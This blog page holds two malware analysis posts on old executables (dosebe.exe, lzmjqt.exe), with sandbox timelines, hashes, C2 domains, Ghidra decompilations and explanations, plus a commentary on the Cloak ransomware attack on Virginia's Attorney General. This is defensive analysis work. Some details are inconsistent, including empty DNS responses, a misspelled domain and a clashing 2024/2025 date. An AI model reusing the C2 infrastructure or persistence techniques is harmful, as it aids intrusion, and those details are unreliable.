Author: Ben

This is more or less a part five to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

+47 ms	Loads C:\Users\admin\dosebe.exe
+63 ms	dosebe.exe writes a new shell key to WinLogon registry
+218 ms	Creates process svchost.exe
+703 ms	svchost.exe drops file C:\Users\admin\cbzvl.exe
+1517 ms	DNS request to jebena.ananikolic[.]su (45.144.3.149)
+32241 ms	DNS request to peer.pickeklosarske.ru (45.144.3.149)
+61963 ms	DNS request to teske.pornicarke[.]com (193.166.255.171)
+91680 ms	DNS request to juice.losmibracala[.]org (208.100.26.242)

OSINT

Filename	dosebe.exe
VirusTotal Score	61/66
MD5	40d00a6ddf83ba1641a45b1f804dbb1e
SHA1	a15d491a472979b82c9c52b2c13310444d19cddb
SHA256	a5de6732da831bda38e6ff36e47b826a572b609b1c98956832c8b19f5564087c

The executable drops the cbzvl.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com, portal.roomshowerbord[.]com, teske.pornicarke[.]com, and juice.losmibracala[.]org.

AnyRun captured a pcap and the DNS output is such:

Request sent to jebena.ananikolic[.]su.

Response received:

Request sent to peer.pickeklosarske[.]ru:

Response as:

Request sent to teske.prnicarke[.]com:

Response as:

Request sent to juice.losmibracala[.]org:

Response as:

Reverse engineering the malware with Ghidra gives the following decompilation:

void entry(void)

{
  undefined4 uVar1;
  undefined uVar2;
  ushort in_AX;
  UINT UVar3;
  LPSYSTEMTIME p_Var4;
  size_t sVar5;
  int iVar6;
  uint uVar7;
  uint uVar8;
  DWORD DVar9;
  BOOL BVar10;
  char extraout_CL;
  char extraout_CL_00;
  char extraout_CL_01;
  char cVar11;
  undefined extraout_CL_02;
  byte extraout_CL_03;
  uint extraout_ECX;
  uint extraout_ECX_00;
  uint extraout_ECX_01;
  uint extraout_ECX_02;
  uint extraout_ECX_03;
  undefined4 extraout_ECX_04;
  char *extraout_ECX_05;
  char *extraout_ECX_06;
  uint extraout_ECX_07;
  short extraout_DX;
  undefined2 extraout_DX_00;
  short extraout_DX_01;
  ushort extraout_DX_02;
  short extraout_DX_03;
  undefined2 extraout_DX_04;
  int extraout_EDX;
  char extraout_DH;
  uint extraout_EDX_00;
  uint extraout_EDX_01;
  uint extraout_EDX_02;
  uint extraout_EDX_03;
  int extraout_EDX_04;
  int extraout_EDX_05;
  int extraout_EDX_06;
  int extraout_EDX_07;
  char extraout_DH_00;
  uint extraout_EDX_08;
  byte unaff_BL;
  char *pcVar12;
  char *unaff_ESI;
  uint uVar13;
  int iVar14;
  ushort uVar15;
  char *unaff_EDI;
  bool bVar16;
  byte bVar17;
  short sVar18;
  ushort uVar19;
  char *pcVar20;
  char *pcVar21;
  char *pcVar22;
  _STARTUPINFOA local_184;
  _SYSTEMTIME local_140;
  int local_12c;
  _STARTUPINFOA local_128;
  _STARTUPINFOA local_e4;
  char *local_a0;
  int local_9c;
  ushort local_98;
  undefined local_94;
  uint local_90;
  ushort local_8c;
  char *local_88;
  _STARTUPINFOA local_84;
  char local_40;
  byte local_3c;
  LARGE_INTEGER local_38;
  ushort local_30;
  char *local_2c;
  char *local_28;
  _SYSTEMTIME local_24;
  short local_14;
  byte local_10;
  char *local_c;
  char *local_8;
  
  if (((ushort)unaff_EDI & in_AX) != 0) {
    strlen("Ycicst. Srybs C");
    unaff_EDI = local_8;
  }
  bVar17 = (byte)local_c;
  local_8 = (char *)0x0;
  UVar3 = GetOEMCP();
  if (DAT_0040a007 == extraout_CL) {
    if ((UVar3 & 0xf409) == 0) {
      local_8 = (char *)((int)local_8 - 0xb2ef8);
      local_10 = unaff_BL & bVar17;
    }
    local_c = (char *)((int)local_c + 0x54da70);
    local_14 = (short)unaff_EDI;
  }
  pcVar22 = local_8;
  p_Var4 = &local_24;
  GetSystemTime(p_Var4);
  if (p_Var4 == (LPSYSTEMTIME)0x0) {
    pcVar22 = (char *)CONCAT31((int3)((uint)pcVar22 >> 8),~(byte)pcVar22);
    unaff_EDI = (char *)((uint)unaff_EDI & (uint)local_8);
    p_Var4 = (LPSYSTEMTIME)0x0;
    DAT_0040a108 = 0xa4;
    _DAT_0040a0dc = 0;
  }
  _DAT_0040a10c = SUB42(p_Var4,0);
  strlen("Mootnm Ipwru. Hkj");
  DAT_0040a088 = 0xffffffff;
  pcVar20 = "Fmsmhw Ji, Xim. C";
  strlen("Fmsmhw Ji, Xim. C");
  if (local_14 == (short)unaff_EDI) {
    local_c = (char *)((int)local_c + 0x168);
  }
  local_8 = pcVar20;
  puts("Tutqyud Silqx Bkcf");
  local_14 = 0x2b0;
  strlen("Tycah Itd, Eekq");
  if (DAT_0040a109 != (byte)pcVar22) {
    DAT_0040a110 = DAT_0040a110 - extraout_EDX;
  }
  local_c = (char *)((uint)local_c & 0x584320);
  DAT_0040a08c = DAT_0040a08c + 0x1b87a4;
  DAT_0040a007 = (char)((uint)extraout_EDX >> 8);
  local_8 = pcVar22;
  puts("Jwbcam. Iunei. N");
  if (local_8 != unaff_ESI) {
    local_28 = unaff_EDI;
    local_14 = (short)unaff_EDI;
  }
  local_2c = (char *)0xa4;
  local_c = (char *)((uint)local_c | 0xc17010);
  local_30 = 0;
  uVar7 = (int)unaff_EDI - (int)DAT_0040a090;
  UVar3 = GetACP();
  bVar16 = false;
  if (UVar3 != 0) {
    bVar16 = local_2c < unaff_ESI;
    if (local_2c == unaff_ESI) {
      bVar16 = 0xf99f < (ushort)UVar3;
    }
    local_30 = 0xffff;
  }
  local_28 = (char *)(((int)local_28 - 1U) - (uint)bVar16);
  local_14 = 0xa010;
  sVar5 = strlen("Ysviuic Wvocjk, T");
  if ((DAT_0040a10a == (char)((uint)pcVar22 >> 8)) && (local_10 = 0x74, (sVar5 & 0x54d78432) != 0))
  {
    local_8 = (char *)0xffffffff;
  }
  QueryPerformanceCounter(&local_38);
  pcVar22 = (char *)DAT_0040a088;
  pcVar20 = local_c;
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a0e4);
  if (pcVar20 != (char *)0x0) {
    if ((char)pcVar20 != -0x1f) {
      unaff_ESI = local_c;
    }
    DAT_0040a090 = (char *)0x0;
    local_3c = extraout_CL_00;
  }
  if (pcVar20 == (char *)DAT_0040a104) {
    strlen("Sybibl Jeiiklfh");
  }
  GetSystemTime(&local_24);
  pcVar20 = "Fsbwlfq Eu, Fte";
  sVar5 = strlen("Fsbwlfq Eu, Fte");
  if (sVar5 == 0) {
    local_14 = 0x360;
    DAT_0040a012 = SUB42(pcVar22,0);
    if (local_30 == 0x9e84) {
      local_28 = (char *)((uint)local_28 | (uint)pcVar20);
    }
    DAT_0040a06c = 0;
  }
  uVar13 = (uint)unaff_ESI | sVar5;
  puts("Mcho Cvtc Mhika Xi");
  if (local_3c == (char)pcVar22) {
    DAT_0040a024 = DAT_0040a024 - uVar7;
    uVar13 = (uint)(char)pcVar22;
    pcVar22 = (char *)DAT_0040a110;
  }
  local_28 = (char *)0x0;
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a114);
  if (DAT_0040a124 != uVar13) {
    if (extraout_ECX != uVar7) {
      local_c = (char *)0x1;
    }
    local_30 = 1;
    local_2c = (char *)uVar13;
  }
  local_40 = (char)pcVar22;
  GetACP();
  pcVar20 = local_8;
  if (local_8 != (char *)extraout_ECX_00) {
    if ((extraout_ECX_00 & uVar7) == 0) {
      local_2c = (char *)0x1;
    }
    _DAT_0040a128 = _DAT_0040a128 ^ 0x3b4;
    local_8 = (char *)0xffffffff;
    pcVar22 = pcVar20;
  }
  DAT_0040a108 = DAT_0040a108 | (byte)(extraout_ECX_00 >> 8);
  iVar6 = puts("Tbvt. Fkfnhf Bcdk");
  DAT_0040a007 = (char)iVar6;
  GetStartupInfoA(&local_84);
  DAT_0040a007 = extraout_DH;
  iVar6 = puts("Hgxhmlk Avfds Oaa");
  FUN_004087d3();
  if (((int)pcVar22 - iVar6 & extraout_ECX_01) == 0) {
    p_Var4 = &local_24;
    GetSystemTime(p_Var4);
    if (p_Var4 == (LPSYSTEMTIME)0x0) {
      local_8 = (char *)((uint)local_8 ^ extraout_EDX_00);
    }
    GetOEMCP();
  }
  sVar5 = strlen("Xilab Nduma Wlrgpen");
  if (sVar5 != 0) {
    local_8 = (char *)((uint)local_8 ^ 1);
  }
  UVar3 = GetACP();
  DAT_0040a090 = (char *)((uint)DAT_0040a090 & extraout_EDX_01);
  bVar16 = CARRY4((uint)local_2c,extraout_ECX_02);
  uVar7 = (int)local_2c + extraout_ECX_02;
  local_2c = (char *)(uVar7 + CARRY4(UVar3,(uint)local_28));
  DAT_0040a104 = (DAT_0040a104 - 1) -
                 (uint)(bVar16 || CARRY4(uVar7,(uint)CARRY4(UVar3,(uint)local_28)));
  local_88 = (char *)0xffffffff;
  GetSystemTime(&local_24);
  _DAT_0040a0e2 = _DAT_0040a0e2 - extraout_DX;
  local_2c = (char *)0x0;
  FUN_00407392();
  DAT_0040a10b = DAT_0040a10b & 1;
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a028);
  pcVar22 = local_88;
  cVar11 = 'h';
  uVar7 = puts("Oobpuqc Fidhdlco");
  if (uVar7 != 0) {
    uVar7 = -uVar7;
  }
  DAT_0040a090 = pcVar22;
  uVar13 = uVar7;
  if (uVar7 == 0x4f225587) {
    uVar13 = GetACP();
    cVar11 = extraout_CL_01;
  }
  local_40 = (char)uVar13;
  DAT_0040a130 = (DAT_0040a130 - cVar11) - (uVar7 < 0x4f225587);
  bVar17 = 0xff5ae08f < local_c;
  local_c = (char *)((int)local_c + 0xa51f70);
  GetSystemTime(&local_24);
  bVar16 = CARRY4(_DAT_0040a0f4,extraout_ECX_03);
  uVar7 = _DAT_0040a0f4 + extraout_ECX_03;
  _DAT_0040a0f4 = uVar7 + bVar17;
  local_2c = (char *)(((int)local_2c + -0x3e7f8) - (uint)(bVar16 || CARRY4(uVar7,(uint)bVar17)));
  uVar7 = extraout_EDX_02 & 0xff;
  uVar13 = local_90 & DAT_0040a080;
  GetTickCount();
  local_10 = (byte)extraout_ECX_04;
  local_90 = uVar13;
  FUN_00408943(extraout_ECX_04,extraout_DX_00);
  local_3c = 0;
  local_94 = extraout_CL_02;
  if ((POPCOUNT(uVar7 & uVar13) & 1U) == 0) {
    GetSystemTime((LPSYSTEMTIME)&DAT_0040a13c);
    local_3c = 0xff;
    local_94 = 0x7c;
    uVar8 = puts("Sxfogiabg Ott My. A");
    if ((DAT_0040a007 != '\0') &&
       (uVar7 = uVar7 | uVar8, DAT_0040a14c = uVar13, (uVar8 & 0x832bb7f) == 0)) {
      pcVar22 = local_2c;
      local_2c = local_2c + 0x29c;
    }
  }
  pcVar20 = (char *)CONCAT22((short)(uVar13 >> 0x10),(short)(char)uVar7);
  GetTickCount();
  local_28 = extraout_ECX_05;
  uVar2 = 0x90;
  iVar6 = puts("Abiqyb. Hkh, Fmku");
  local_94 = uVar2;
  if (iVar6 == 0) {
    DAT_0040a076 = -0x6870;
    DAT_0040a150 = pcVar20;
    local_2c = pcVar22;
  }
  uVar7 = CONCAT22((short)(uVar7 >> 0x10),local_98);
  GetACP();
  sVar18 = 0x16a4;
  puts("Fggoct, Gsnr, Xg");
  if (DAT_0040a076 == sVar18) {
    uVar7 = extraout_EDX_03 & 0xff;
    _DAT_0040a0e0 = 0x8c38;
  }
  pcVar12 = (char *)CONCAT31((int3)(uVar7 >> 8),(char)uVar7 - DAT_0040a007);
  pcVar21 = "Jnq. Vauqb. Wyfnn";
  iVar6 = puts("Jnq. Vauqb. Wyfnn");
  if (iVar6 != 0) {
    local_c = (char *)((int)local_c - 0x204);
    DAT_0040a074 = 0x2dc;
    local_88 = pcVar21;
  }
  iVar6 = puts("Rlpvnuv Mcctsy, Qo");
  if (iVar6 != 0) {
    pcVar20 = pcVar20 + 1;
    _DAT_0040a154 = _DAT_0040a154 | 0xc9de0;
    local_98 = (ushort)pcVar22;
  }
  pcVar21 = "Yjlfs. Xsptho Klvob";
  strlen("Yjlfs. Xsptho Klvob");
  FUN_00408943(pcVar21,~extraout_DX_02);
  sVar18 = 0x16f4;
  sVar5 = strlen("Gjvuqgvhw Tvkal");
  if (local_28 == pcVar20) {
    local_2c = (char *)0x1;
    _DAT_0040a10e = _DAT_0040a10e + -1 + (ushort)(sVar18 != 0);
    local_8 = (char *)sVar5;
    if (extraout_DX_03 == (ushort)((ushort)pcVar22 - extraout_DX_01)) {
      local_8c = 0xffff;
    }
  }
  if ((char)(sVar5 >> 8) == local_40) {
    GetSystemTime((LPSYSTEMTIME)&DAT_0040a13c);
  }
  sVar5 = strlen("Pspucxhd Ubjy Tdv");
  if (DAT_0040a024 != sVar5) {
    pcVar20 = (char *)CONCAT22((short)((uint)pcVar20 >> 0x10),0xffff);
    local_14 = 0;
    local_28 = (char *)((uint)local_28 ^ 1);
    _DAT_0040a0e0 = extraout_DX_04;
  }
  DVar9 = GetTickCount();
  uVar7 = local_90;
  iVar6 = local_9c;
  if (local_90 != DVar9) {
    local_10 = 0xb0;
    _DAT_0040a00c = _DAT_0040a00c ^ 0x3dd67c;
    local_2c = (char *)0x165cc0;
    local_88 = pcVar20;
  }
  pcVar22 = "Ccdi, Ttlvel Jibylh";
  strlen("Ccdi, Ttlvel Jibylh");
  local_a0 = pcVar22;
  sVar5 = strlen("Vytudd Lughjrjm Rfl");
  if (sVar5 == 0) {
    bVar16 = uVar7 < DAT_0040a008;
    uVar7 = uVar7 - DAT_0040a008;
    local_9c = (local_9c + -0x197428) - (uint)bVar16;
    local_3c = 0;
  }
  GetStartupInfoA(&local_e4);
  _DAT_0040a158 = iVar6;
  local_a0 = local_a0 + extraout_EDX_04;
  sVar5 = strlen("Ysryovb. Bqprr Fo");
  uVar15 = (ushort)uVar7;
  if (sVar5 == 0) {
    uVar15 = local_98;
  }
  DAT_0040a150 = (char *)extraout_EDX_05;
  strlen("Adfmn, Lmlpd. Gyrgm");
  if (local_8c != uVar15) {
    local_a0 = (char *)((uint)local_a0 | (uint)pcVar12);
    local_98 = 0x930;
    _DAT_0040a15c = 0x55e0;
    local_88 = (char *)((uint)local_88 ^ 0xffffffc8);
  }
  GetStartupInfoA(&local_128);
  local_a0 = (char *)0xb57d00;
  bVar17 = FUN_00407392();
  local_2c = (char *)((uint)local_2c & 0x3709d0);
  bVar16 = (DAT_0040a109 & bVar17) != 0;
  pcVar22 = extraout_ECX_06;
  iVar14 = extraout_EDX_06;
  pcVar20 = pcVar12;
  if (bVar16) {
    pcVar22 = "Rtfloofwp Goduw";
    puts("Rtfloofwp Goduw");
    local_14 = 0x3c;
    pcVar20 = pcVar12 + -1;
    iVar14 = extraout_EDX_07;
  }
  iVar14 = (iVar6 - iVar14) - (uint)(bVar16 && pcVar12 == (char *)0x0);
  uVar19 = 0x1778;
  DAT_0040a100 = pcVar22;
  iVar6 = puts("Utufodo Fiydogv Cb");
  bVar17 = local_8c < uVar19;
  if (local_8c != uVar19) {
    bVar17 = false;
    if ((iVar6 + (int)local_8 & 0x6af9U) != 0) {
      pcVar20 = (char *)(int)extraout_DH_00;
    }
    local_28 = (char *)0xffffffff;
    local_88 = pcVar20;
  }
  GetOEMCP();
  uVar1 = DAT_0040a0f8;
  local_2c = (char *)DAT_0040a0f8;
  GetTickCount();
  local_28 = local_28 + bVar17 + 0x218;
  strlen("Cqxmxdfdiy, Blh");
  if (local_30 != uVar15) {
    _DAT_0040a158 = _DAT_0040a158 + 0x2c1d04;
    iVar14 = 0;
    local_28 = (char *)((uint)local_28 | 0x697dc);
  }
  pcVar20 = "Valioyx. Tqawb. Kvf";
  pcVar22 = (char *)puts("Valioyx. Tqawb. Kvf");
  if (local_3c == (byte)pcVar22) {
    DAT_0040a076 = (DAT_0040a076 + 1) - (ushort)(local_3c < (byte)pcVar22);
    local_30 = 0x134;
    local_9c = 0;
    if ((int)pcVar20 <= (int)pcVar22) {
      iVar14 = iVar14 + DAT_0040a06c + (uint)(pcVar22 < pcVar20);
    }
  }
  bVar17 = ~(byte)((uint)uVar1 >> 8);
  GetTickCount();
  bVar16 = DAT_0040a004 < bVar17;
  DAT_0040a004 = DAT_0040a004 - bVar17;
  uVar7 = (uint)bVar16;
  bVar16 = CARRY4((uint)local_c,extraout_ECX_07);
  uVar13 = (int)local_c + extraout_ECX_07;
  local_c = (char *)(uVar13 + uVar7);
  _DAT_0040a158 = (_DAT_0040a158 - iVar14) - (uint)(bVar16 || CARRY4(uVar13,uVar7));
  local_9c = iVar14;
  FUN_004087d3();
  bVar17 = 0;
  local_14 = 0x12f0;
  strlen("Mhewyj Hi. Yejpask");
  pcVar22 = local_c;
  puts("Usnguq, Fb, Ebqq. M");
  _DAT_0040a00c = _DAT_0040a00c + 1 + (uint)bVar17;
  GetACP();
  DVar9 = GetTickCount();
  if ((DVar9 != 0x61) && (strlen("Mixujmbx Khjawk Lh"), DAT_0040a100 != pcVar22)) {
    local_12c = local_12c + -1;
    local_88 = (char *)0x90;
  }
  GetACP();
  GetSystemTime(&local_24);
  GetACP();
  GetSystemTime(&local_140);
  uVar1 = DAT_0040a160;
  DAT_0040a131 = DAT_0040a131 + -0x10;
  GetStartupInfoA(&local_184);
  if (DAT_0040a080 == extraout_EDX_08) {
    local_10 = (byte)uVar1;
  }
  _DAT_0040a15c = 1;
  BVar10 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a078);
  bVar17 = DAT_0040a108 < extraout_CL_03;
  if (DAT_0040a108 != extraout_CL_03) {
    bVar17 = local_8 < 0x9b5850;
    if (local_8 != (char *)0x9b5850) {
      bVar17 = 0xd4bb < (ushort)BVar10;
    }
    DAT_0040a0f8 = 0xf0378;
  }
  GetTickCount();
  DAT_0040a150 = (char *)(((int)DAT_0040a150 + 1) - (uint)bVar17);
  local_10 = 0;
  local_40 = 0;
  FUN_0040784e();
                    /* WARNING: Subroutine does not return */
  ExitProcess(0);
}

Below is a step-by-step analysis of what the provided decompiled executable (entry function) does, presented in bullet points in the order of execution. This appears to be a Windows application entry point with a mix of system calls, string operations, and arithmetic/logic manipulations. Note that many operations seem obfuscated or redundant, which might suggest intentional complexity or incomplete decompilation context.

• Initial condition check: If the bitwise AND of unaff_EDI (an uninitialized pointer) and in_AX (a register value) is non-zero, compute the length of the string "Ycicst. Srybs C" using strlen and set unaff_EDI to local_8 (initially uninitialized).
• Set initial values: Assign local_8 to 0x0 (null) and retrieve the OEM code page via GetOEMCP(), storing it in UVar3.
• OEMCP and condition adjustments: Compare DAT_0040a007 with extraout_CL (a leftover register value). If equal:
• If UVar3 & 0xf409 is zero, adjust local_8 by subtracting 0xb2ef8 and set local_10 to the bitwise AND of unaff_BL and bVar17.
• Increment local_c by 0x54da70 and set local_14 to the lower 16 bits of unaff_EDI.
• Get system time: Call GetSystemTime(&local_24) to retrieve the current system time into local_24. If the pointer p_Var4 is null (which shouldn’t happen here), perform bitwise operations on pcVar22 and unaff_EDI, set DAT_0040a108 to 0xa4, and reset _DAT_0040a0dc to 0.
• Miscellaneous assignments: Set _DAT_0040a10c to the lower 32 bits of p_Var4, compute strlen("Mootnm Ipwru. Hkj"), and set DAT_0040a088 to 0xffffffff.
• String operations: Compute strlen("Fmsmhw Ji, Xim. C"). If local_14 equals the lower 16 bits of unaff_EDI, increment local_c by 0x168.
• Output and more adjustments: Set local_8 to "Fmsmhw Ji, Xim. C", output "Tutqyud Silqx Bkcf" via puts, set local_14 to 0x2b0, and compute strlen("Tycah Itd, Eekq"). If DAT_0040a109 differs from the lower byte of pcVar22, subtract extraout_EDX from DAT_0040a110.
• Bitwise and arithmetic: Update local_c with a mask (& 0x584320), increment DAT_0040a08c by 0x1b87a4, set DAT_0040a007 to the second byte of extraout_EDX, output "Jwbcam. Iunei. N" via puts, and conditionally set local_28 and local_14 if local_8 differs from unaff_ESI.
• Further initialization: Set local_2c to 0xa4, update local_c with a bitwise OR (| 0xc17010), reset local_30 to 0, compute uVar7 as the difference between unaff_EDI and DAT_0040a090, and retrieve the ANSI code page via GetACP().
• Code page comparison: Based on GetACP() result, set local_30 to 0xffff if non-zero and adjust local_28 with a carry flag. Set local_14 to 0xa010.
• String and performance counter: Compute strlen("Ysviuic Wvocjk, T"). If conditions involving DAT_0040a10a and sVar5 are met, set local_8 to 0xffffffff. Call QueryPerformanceCounter(&local_38) to get a high-resolution timestamp.
• System time and conditions: Retrieve system time into DAT_0040a0e4. If pcVar20 (previously local_c) is non-null and not -0x1f, set unaff_ESI to local_c. Reset DAT_0040a090 to 0 and update local_3c. If pcVar20 equals DAT_0040a104, compute strlen("Sybibl Jeiiklfh").
• Repeated system time and string checks: Call GetSystemTime(&local_24), compute strlen("Fsbwlfq Eu, Fte"). If the length is 0, set local_14 to 0x360, update DAT_0040a012, and conditionally modify local_28 and DAT_0040a06c.
• Output and bitwise updates: Output "Mcho Cvtc Mhika Xi" via puts. If local_3c equals the lower byte of pcVar22, adjust DAT_0040a024 and update uVar13. Reset local_28 to 0 and retrieve system time into DAT_0040a114.
• Conditional arithmetic: Based on comparisons involving DAT_0040a124, extraout_ECX, and uVar7, update local_c, local_30, and local_2c. Retrieve the ANSI code page again via GetACP().
• More output and bitwise ops: If local_8 differs from extraout_ECX_00, adjust local_2c, _DAT_0040a128, and local_8. Update DAT_0040a108 and output "Tbvt. Fkfnhf Bcdk" via puts. Set DAT_0040a007 to the return value of puts.
• Startup info and function calls: Retrieve startup info into local_84 via GetStartupInfoA, update DAT_0040a007, output "Hgxhmlk Avfds Oaa", and call FUN_004087d3. Conditionally retrieve system time and adjust local_8.
• String length and ACP: Compute strlen("Xilab Nduma Wlrgpen"). If non-zero, XOR local_8 with 1. Retrieve the ANSI code page again and perform arithmetic on DAT_0040a090, local_2c, and DAT_0040a104.
• More system calls and output: Set local_88 to 0xffffffff, retrieve system time, adjust _DAT_0040a0e2, reset local_2c, call FUN_00407392, update DAT_0040a10b, retrieve startup info into DAT_0040a028, and output "Oobpuqc Fidhdlco".
• Tick count and adjustments: Negate uVar7 if non-zero, update DAT_0040a090, and conditionally retrieve GetACP() if uVar7 equals 0x4f225587. Adjust DAT_0040a130 and local_c.
• Performance counter and system time: Retrieve system time, perform arithmetic on _DAT_0040a0f4 and local_2c, call GetTickCount(), and invoke FUN_00408943. Conditionally retrieve system time and output "Sxfogiabg Ott My. A".
• Further string outputs: Output "Abiqyb. Hkh, Fmku". If the return value is 0, update DAT_0040a076 and DAT_0040a150. Retrieve GetACP(), output "Fggoct, Gsnr, Xg", and conditionally update _DAT_0040a0e0.
• String and pointer manipulations: Output "Jnq. Vauqb. Wyfnn" and "Rlpvnuv Mcctsy, Qo", adjusting local_c, DAT_0040a074, _DAT_0040a154, and local_98 based on return values.
• Final system calls and exit: Repeatedly call GetSystemTime, GetACP, GetTickCount, and GetStartupInfoA. Update various global variables (_DAT_0040a158, _DAT_0040a15c, etc.), call QueryPerformanceCounter, and invoke FUN_0040784e. Finally, terminate the process with ExitProcess(0), which does not return.

Conclusion

Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

IOCs

44.221.84[.]105

193.166.255[.]171

portal.roomshowerbord[.]com

slade.safehousenumber[.]com

world.rickstudio[.]ru

banana.cocolands[.]su

40D00A6DDF83BA1641A45B1F804DBB1E

A15D491A472979B82C9C52B2C13310444D19CDDB

A5DE6732DA831BDA38E6FF36E47B826A572B609B1C98956832C8B19F5564087C

dosebe.exe

This one hits close to home being a fellow Virginian — a citizen of this Great Commonwealth, Ol’ Dominion.

It looks like 2024 kicked off with a ransomware banger that’s got Virginia’s top legal dogs scrambling. The Cloak ransomware gang hit the Virginia Attorney General’s Office back in February, and the fallout’s still echoing as I type this in March. If you thought government systems were Fort Knox, think again. This attack’s a neon sign screaming, “Your defenses suck,” and it’s time we dissect the mess.

So, picture this: mid-February 2024, the Virginia AG’s IT crew wakes up to a nightmare. Systems down, email kaput, VPN toast, and the website? A ghost town. Chief Deputy AG Steven Popps had to fire off an SOS via his smartphone—how’s that for irony? Staff were told to dust off their quills and go full 1990s with paper filings. The Cloak gang, not ones to miss a flex, claimed the hit, and by March 20, 2025, they’d plastered the darknet with 134GB of stolen goodies. Legal docs, sensitive records—you name it, they nabbed it. No ransom paid? No mercy. The data’s out there now, free for any creep with a Tor browser.

Cloak’s no rookie outfit. These guys have been slinking around since 2022, racking up 65 victims—13 confirmed, including this Virginia fiasco. They’re wielding an ARCrypter variant, a nasty little toy cribbed from the leaked Babuk ransomware code. Think of it as a cyber Frankenstein: stitched together, relentless, and dang hard to spot. They sneak in via social engineering—phishing emails, fake updates—or buy their way through initial access brokers. Once inside, it’s game over: systems locked, backups trashed, and a ransom note that’d make your grandma pay up.

What’s wild is how Virginia’s AG office, the state’s legal backbone, got caught with its pants down. This isn’t some podunk SMB in Europe or Asia—Cloak’s usual playground. This is a government gig, handling everything from court battles to law enforcement tie-ins. The FBI and Virginia State Police are on it, but details? Scarce. Did they pay? How’d Cloak breach the gates? We’re still in the dark, and the AG’s lips are sealed tighter than a crypto wallet. My guess: they’re sweating bullets over what’s in that 134GB dump.

This isn’t just a Virginia problem—it’s a 2024 trend on steroids. Ransomware’s up, with 5,414 incidents reported last year per Cyberint. Cloak’s first confirmed 2024 hit proves the bad guys aren’t slowing down. They’ve got a slick 85/15 profit split for affiliates, no upfront costs, and a knack for crippling critical systems. Virginia’s reversion to paper? That’s downtime measured in weeks, not hours. Add the risk of leaked citizen data, and you’ve got a taxpayer-funded disaster.

Lesson here? Patch your stuff, train your people, and stop skimping on security. Cloak’s laughing all the way to the bank while Virginia’s AG scrambles. If a state-level office can’t hold the line, what chance do the rest of us have? Stay sharp, folks—this cyber war’s just heating up.

This is more or less a part four to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

+47 ms	File drops C:\Users\admin\lzmjqt.exe
+63 ms	lzmjqt.exe writes a new shell key to WinLogon registry
+218 ms	Creates process svchost.exe
+266 ms	svchost.exe runs file C:\Users\admin\dcubkr.exe
+1610 ms	DNS request to slade.safehousenumber[.]com
+31268 ms	murik.portal-protection[.]net[.]ru
+61014 ms	world.rickstudio[.]ru
+90744 ms	banana.cocolands[.]su
+121.47 s	DNS request to portal.roomshowerbord[.]com
+301.69 s	DNS request to portal.roomshowerbord[.]com

The executable drops the dcubkr.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.

AnyRun captured a pcap and the DNS output is such:

The first request sent to safehousenumber (44.221.84[.]105)received a response, containing the following bytes:

Second request was sent to murik.portal-protection[.].net[.]ru:

Response is:

Reverse engineering the malware with Ghidra gives the following decompilation:

void entry(void)

{
  undefined4 *puVar1;
  uint extraout_ECX;
  byte *pbVar2;
  char **local_8c;
  _startupinfo local_88;
  int local_84;
  char **local_80;
  int local_7c;
  _STARTUPINFOA local_78;
  undefined *local_34;
  void *pvStack_2c;
  undefined *puStack_28;
  undefined *puStack_24;
  undefined4 local_20;
  undefined *puStack_1c;
  
  puStack_1c = &stack0xfffffffc;
  puStack_24 = &DAT_00426010;
  puStack_28 = &DAT_00402160;
  pvStack_2c = ExceptionList;
  local_34 = &stack0xffffff54;
  local_20 = 0;
  ExceptionList = &pvStack_2c;
  __set_app_type(2);
  _DAT_004260f8 = 0xffffffff;
  _DAT_004261b4 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_004261cc;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_004260f4;
  _DAT_00426144 = *(undefined4 *)_adjust_fdiv_exref;
  FUN_00402122();
  if (DAT_004261c8 == 0) {
    __setusermatherr(&DAT_0042638c);
  }
  FUN_00402122();
  _initterm(&DAT_0042603c,&DAT_0042603c);
  local_88.newmode = DAT_004261ec;
  __getmainargs(&local_7c,&local_8c,&local_80,DAT_00426180,&local_88);
  _initterm(&DAT_0042603c,&DAT_0042603c);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_004020bb;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_004020bb;
  do {
    pbVar2 = pbVar2 + 1;
LAB_004020bb:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_78.dwFlags = 0;
  GetStartupInfoA(&local_78);
  GetModuleHandleA((LPCSTR)0x0);
  local_84 = FUN_00401000(extraout_ECX);
                    /* WARNING: Subroutine does not return */
  exit(local_84);
}

Below is an analysis of the code:

Stack and variable initialization: The function begins by setting up the stack frame and initializing several local variables and pointers (e.g., puStack_1c, puStack_24, puStack_28, pvStack_2c, local_34, etc.). These are used to manage the runtime environment, exception handling, and function arguments.

Exception handling setup: The ExceptionList is assigned the address of pvStack_2c, establishing a mechanism for exception handling during execution.Set application type: The function calls __set_app_type(2), which likely designates the program as a console application (type 2 typically indicates a console app in certain runtime environments like MSVCRT).

Initialize global variables: Two global variables, _DAT_004260f8 and _DAT_004261b4, are set to 0xffffffff (likely -1), possibly indicating uninitialized or default states for some runtime settings.

Set file mode: The function retrieves a pointer to the file mode variable via __p__fmode() and sets it to the value stored in DAT_004261cc, configuring how file operations are handled (e.g., text or binary mode).

